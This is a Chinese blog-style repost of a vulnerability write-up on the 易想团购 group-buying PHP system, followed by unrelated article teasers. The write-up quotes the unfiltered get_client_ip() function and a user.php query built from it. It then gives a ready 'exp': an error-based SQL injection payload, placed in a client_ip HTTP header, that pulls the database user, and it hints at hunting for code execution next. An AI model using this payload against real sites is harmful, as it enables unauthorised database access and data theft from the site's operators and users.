易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...

news/2024/7/3 0:39:34

刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序,

找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip);}

果然没过滤,看了下很多地方用到这个函数。

比如if($_REQUEST['act'] == 'verify'){$id = intval($_REQUEST['id']);$user_info = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);if(!$user_info){showErr($GLOBALS['lang']['NO_THIS_USER']);}$verify = $_REQUEST['code'];if($user_info['verify'] == $verify){//成功$_SESSION['user_info'] = $user_info;$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");}

团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警》(https://www.unjs.com)。

果断的,登陆的时候在http头里面加了个client_ip,值为127′

看图:

报错注入,很简单吧,

exp:

火狐插件增加client_ip

值为

‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

这套程序用的thinkphp的框架,待会看看有没有代码执行。。。。


http://lihuaxi.xjx100.cn/news/282059.html

相关文章

图像处理基础:颜色空间及其OpenCV实现

点击上方“小白学视觉”,选择加"星标"或“置顶”重磅干货,第一时间送达作者:Soumyadip Sarkar编译:ronghuaiyang转自:AI公园导读对图像的颜色空间做了一个概念性的介绍,并通过代码的方式可视化了…

50行Python代码,获取公众号全部文章

作者 | 胖虎转载自Python3X(ID: python3xxx )爬取公众号的方式常见的有两种:通过搜狗搜索去获取,缺点是只能获取最新的十条推送文章。通过微信公众号的素材管理,获取公众号文章。缺点是需要申请自己的公众号。今天介绍…

借助阿里云数加,小小的美甲行业被美甲帮玩出了天价。

原文链接:http://click.aliyun.com/m/13860/ 免费开通大数据服务:https://www.aliyun.com/product/odps“数加对于创业公司来说是一个非常好的平台,可以在有限的投入下,充分地享受到阿里云已经有的技术和经验,站在巨人…

Emptyproject分析

Emptyproject分析(SimpleSample)1,InitApp()WinMain中有一个InitApp(),在sample中存在,但是在emptyproject中没有,该函数是用于设定已经声明的一些一般变量的初始值的。比如某些按钮。2,IsDeviceAcceptable()被WinMain…

oracle9201怎么安装,Solaris10上安装64位Oracle9201

根据Oracle官方文档的步骤进行安装,首先是对Solaris10上系统需求的检查:# /usr/sbin/prtconf | grep "Memory size"Memory size: 16384 Megabytes# /usr/sbin/swap -lswapfile dev swaplo blocks free/dev/dsk/c1t0d0s1 118,9 16 36877808 368…

简单介绍python中的单向链表实现

大家好,本篇文章主要讲的是python中的单向链表实现,感兴趣的同学赶快来看一看吧,对你有帮助的话记得收藏一下 一、单向链表概念 单向链表的链接方向是单向的,由结点构成,head指针指向第一个成为head结点,而…

图像配准的前世今生:从人工设计特征到深度学习

点击上方“小白学视觉”,选择加"星标"或“置顶”重磅干货,第一时间送达机器之心编译参与:Nurhachu Null,Geek AI作者:Emma Kamoun作为计算机视觉的重要研究课题,图像配准经历了从传统方法走向深度…

优秀博士学位论文精华版:基于深度学习的自然场景文字检测与识别方法研究...

本文选自《中国人工智能学会通讯》 2020年 第10卷 第2期 优秀博士学位论文精华版,CAAI会员中心编辑。该博士论文原作者石葆光2018年毕业于华中科技大学,师从于白翔老师,目前就职于微软雷德蒙德总部。摘 要本文基于深度学习框架,构…